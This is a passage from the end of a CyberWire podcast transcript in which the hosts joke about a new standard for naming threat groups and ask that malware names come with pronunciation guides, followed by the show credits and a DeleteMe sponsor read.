I guess I'm stuck between wanting to be supportive of everyone's good faith efforts here, but left scratching my head as to how this is actually going to change anything and be particularly helpful.
[32:25]
Guest
We'll see. I mean, I'm just. Yeah, I'm just feeling a bit of preemptive pity for the person who has to maintain this moving forward to keep track of all the different group names that everyone's gonna be using. Because if it's not, just they're not coming in and saying, this is the law, everybody. Because good luck with that. Honestly. Yeah, this is what we're calling it. Everybody else, shut up. No. You know that people are going to want to put their own stamp on things. Different groups are going to want to name things their way and. What a mess.
[32:57]
John Miller
Well, let me just close out by saying and suggesting to all of these organizations who are going at this, if you really want to help, and this is a selfish request, include phonetic pronunciation guides for all of these. Yes, please. Because as the people who often have to decide how these things are pronounced, you know, is it Kakbot or is it Quackbot? I don't know.
[33:21]
Guest
And you put a Q without a U. How are we supposed to figure this out?
[33:24]
John Miller
Yeah, right, exactly. And all the lite speak stuff and all that kind of stuff. So if you want to add something to these that could be helpful to those of us who have the responsibility of actually saying these names out loud, include phonetic pronunciation guides. We will be forever grateful and we will forgive you for the redundancy that this new standard seems to be introducing to the ecosystem. All right, Maria, thank you so much for joining us. As they say, time will tell. And that's the Cyberwire. For links to all of today's stories, check out our daily briefing@thecyberwire.com we'd love to hear from you. We're conducting our annual audience survey to learn more about our listeners. We're collecting your insights through the end of August this year. There's a link in the show Notes. Please do check it out. N2K's senior producer is Alice Carruth. Our Cyberwire producer is Liz Stokes. We're mixed by Trey Hester with original music and sound design by Elliot Peltzman. Our executive producer is Jennifer Ibin. Peter Kilpe is our publisher. And I'm Dave Bittner. Thanks for listening. We'll see you back here tomorrow. Hey, everybody. Dave here. I've talked about Delete Me before and I'm still using it because it still works. It's been a few months now, and I'm just as impressed today as I was when I signed up. Deleteme keeps finding and removing my personal information from data broker sites. And they keep me updated with detailed reports so I know exactly what's been taken down. I'm genuinely relieved. Knowing my privacy isn't something I have to worry about every day. The Deleteme team handles everything. It's the set it and forget it peace of mind. And it's not just for individuals. Deleteme also offers solutions for businesses helping companies protect their employees personal information and reduce exposure to social engineering and phishing threats. And right now, our listeners get a special deal. 20% off your delete me plan. Just go to JoinDeleteMe.com N2K and use promo code N2K at checkout. That's JoinDeleteMe.com N2k code N2K.